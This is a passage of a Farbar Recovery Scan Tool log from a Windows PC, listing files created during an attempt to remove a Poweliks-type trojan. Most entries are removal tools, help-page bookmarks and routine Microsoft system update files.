2016-10-16 00:26 - 2016-10-16 00:27 - 00002050 _____ C:\Users\Wayne\Desktop\Rkill1.txt

2016-10-16 00:25 - 2016-10-16 00:25 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Wayne\Desktop\iExplore.exe

2016-10-16 00:01 - 2016-10-16 08:50 - 00006150 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161016.000105.6824.zip

2016-10-15 23:52 - 2016-10-15 23:52 - 00000022 _____ C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe_20161015.235203.4100.zip

2016-10-15 23:50 - 2016-10-15 23:50 - 00224968 _____ (ESET) C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe

2016-10-15 23:47 - 2016-10-15 23:47 - 01577380 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).pdf

2016-10-15 23:41 - 2016-10-15 23:41 - 00000264 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).URL

2016-10-15 23:39 - 2016-10-15 23:39 - 00000287 _____ C:\Users\Wayne\Desktop\Infection by Trojan-PoweLike!bat via bogus Firefox update - Virus, Trojan, Spyware, and Malware Removal Logs.URL

2016-10-15 23:27 - 2016-10-15 23:30 - 00015790 _____ C:\Users\Wayne\Desktop\Fixlog1.txt

2016-10-15 23:18 - 2016-10-16 11:59 - 00000000 ____D C:\FRST

2016-10-15 23:15 - 2016-10-16 11:59 - 02406912 _____ (Farbar) C:\Users\Wayne\Desktop\FRST64.exe

2016-10-15 23:13 - 2016-10-15 23:13 - 00000277 _____ C:\Users\Wayne\Desktop\FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials.URL

2016-10-15 21:41 - 2016-10-15 22:45 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2016-10-15 21:40 - 2016-10-15 21:40 - 00001117 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Malwarebytes

2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware

2016-10-15 21:40 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2016-10-15 21:40 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys

2016-10-15 21:40 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys

2016-10-15 18:33 - 2016-10-15 18:33 - 22851472 _____ (Malwarebytes ) C:\Users\Wayne\Desktop\mbam-setup-2.2.1.1043.exe

2016-10-15 17:05 - 2016-10-15 17:05 - 00000102 _____ C:\Users\Wayne\Desktop\Trojan-Powe!bat infecting my PC - Resolved Malware Removal Logs - Malwarebytes Forums.url

2016-10-15 17:00 - 2016-10-15 17:00 - 00000168 _____ C:\Users\Wayne\Desktop\virusscan on access trojan-powellike!nk keeps appearing - Google Search.url

2016-10-15 16:58 - 2016-10-15 16:58 - 00000084 _____ C:\Users\Wayne\Desktop\On-Access Scan Messages - Trojan-PoweLike!bat -McAfee Communities.url

2016-10-15 16:56 - 2016-10-15 16:56 - 00000173 _____ C:\Users\Wayne\Desktop\Threat Advisory- Trojan-Powelike.url

2016-10-15 16:43 - 2016-10-15 22:27 - 00000000 ____D C:\Users\Wayne\AppData\Roaming\403522

2016-10-15 16:39 - 2016-10-16 09:43 - 00000000 ____D C:\Users\Wayne\AppData\Local\1282a1

2016-10-15 16:39 - 2016-10-15 16:39 - 00000000 ____D C:\Users\Wayne\AppData\Roaming\1282a1

2016-10-15 15:57 - 2016-10-15 15:57 - 00000200 _____ C:\Users\Wayne\Desktop\deturl.com - download videos from YouTube..URL

2016-10-15 15:28 - 2016-09-30 10:13 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll

2016-10-15 15:28 - 2016-09-30 09:28 - 00346312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll

2016-10-15 15:28 - 2016-09-30 05:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe

2016-10-15 15:28 - 2016-09-30 05:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe

2016-10-15 15:28 - 2016-09-30 05:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe

2016-10-15 15:28 - 2016-09-29 21:55 - 25765376 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2016-10-15 15:28 - 2016-09-29 20:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2016-10-15 15:28 - 2016-09-29 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll

2016-10-15 15:28 - 2016-09-29 20:26 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec

2016-10-15 15:28 - 2016-09-29 20:25 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll

2016-10-15 15:28 - 2016-09-29 20:25 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll

2016-10-15 15:28 - 2016-09-29 20:18 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2016-10-15 15:28 - 2016-09-29 20:17 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll

2016-10-15 15:28 - 2016-09-29 20:14 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

2016-10-15 15:28 - 2016-09-29 20:13 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2016-10-15 15:28 - 2016-09-29 20:13 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe

2016-10-15 15:28 - 2016-09-29 20:12 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll

2016-10-15 15:28 - 2016-09-29 20:12 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll

2016-10-15 15:28 - 2016-09-29 20:09 - 06048256 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2016-10-15 15:28 - 2016-09-29 20:05 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe

2016-10-15 15:28 - 2016-09-29 20:02 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2016-10-15 15:28 - 2016-09-29 19:55 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll

2016-10-15 15:28 - 2016-09-29 19:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb

2016-10-15 15:28 - 2016-09-29 19:54 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll

2016-10-15 15:28 - 2016-09-29 19:51 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll

2016-10-15 15:28 - 2016-09-29 19:50 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2016-10-15 15:28 - 2016-09-29 19:47 - 20306944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2016-10-15 15:28 - 2016-09-29 19:47 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2016-10-15 15:28 - 2016-09-29 19:46 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll

2016-10-15 15:28 - 2016-09-29 19:42 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2016-10-15 15:28 - 2016-09-29 19:42 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec

2016-10-15 15:28 - 2016-09-29 19:42 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll

2016-10-15 15:28 - 2016-09-29 19:42 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll

2016-10-15 15:28 - 2016-09-29 19:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll

2016-10-15 15:28 - 2016-09-29 19:38 - 02286592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll

2016-10-15 15:28 - 2016-09-29 19:36 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll

2016-10-15 15:28 - 2016-09-29 19:35 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll

2016-10-15 15:28 - 2016-09-29 19:35 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll

2016-10-15 15:28 - 2016-09-29 19:33 - 00724992 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe

2016-10-15 15:28 - 2016-09-29 19:33 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll

2016-10-15 15:28 - 2016-09-29 19:32 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe

2016-10-15 15:28 - 2016-09-29 19:31 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2016-10-15 15:28 - 2016-09-29 19:31 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll

2016-10-15 15:28 - 2016-09-29 19:24 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll

2016-10-15 15:28 - 2016-09-29 19:21 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2016-10-15 15:28 - 2016-09-29 19:19 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll

2016-10-15 15:28 - 2016-09-29 19:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll

2016-10-15 15:28 - 2016-09-29 19:17 - 02920960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2016-10-15 15:28 - 2016-09-29 19:17 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll

2016-10-15 15:28 - 2016-09-29 19:15 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll

2016-10-15 15:28 - 2016-09-29 19:14 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll

2016-10-15 15:28 - 2016-09-29 19:13 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll

2016-10-15 15:28 - 2016-09-29 19:12 - 04608512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2016-10-15 15:28 - 2016-09-29 19:07 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll

2016-10-15 15:28 - 2016-09-29 19:05 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl

2016-10-15 15:28 - 2016-09-29 19:05 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2016-10-15 15:28 - 2016-09-29 19:05 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll

2016-10-15 15:28 - 2016-09-29 19:05 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2016-10-15 15:28 - 2016-09-29 19:03 - 13653504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2016-10-15 15:28 - 2016-09-29 18:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2016-10-15 15:28 - 2016-09-29 18:46 - 02444288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2016-10-15 15:28 - 2016-09-29 18:43 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2016-10-15 15:28 - 2016-09-29 18:42 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2016-10-15 15:28 - 2016-09-15 05:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll

2016-10-15 15:28 - 2016-09-15 05:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll

2016-10-15 15:28 - 2016-09-15 05:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll

2016-10-15 15:28 - 2016-09-15 05:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll

2016-10-15 15:28 - 2016-09-12 11:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys

2016-10-15 15:28 - 2016-09-12 11:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys

2016-10-15 15:28 - 2016-09-12 11:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll

2016-10-15 15:28 - 2016-09-12 11:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll

2016-10-15 15:28 - 2016-09-12 10:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

2016-10-15 15:28 - 2016-09-12 10:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe

2016-10-15 15:28 - 2016-09-12 10:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2016-10-15 15:28 - 2016-09-12 10:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys

2016-10-15 15:28 - 2016-09-12 10:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys

2016-10-15 15:28 - 2016-09-12 10:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys

2016-10-15 15:28 - 2016-09-12 10:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe

2016-10-15 15:28 - 2016-09-12 10:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe

2016-10-15 15:28 - 2016-09-12 10:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll

2016-10-15 15:28 - 2016-09-12 09:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll

2016-10-15 15:28 - 2016-09-12 08:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll

2016-10-15 15:28 - 2016-09-12 08:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll

2016-10-15 15:28 - 2016-09-10 06:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll

2016-10-15 15:28 - 2016-09-10 05:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll

2016-10-15 15:28 - 2016-09-09 08:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi

2016-10-15 15:28 - 2016-09-09 08:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi

2016-10-15 15:28 - 2016-09-09 08:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 08:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll

2016-10-15 15:28 - 2016-09-09 08:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll

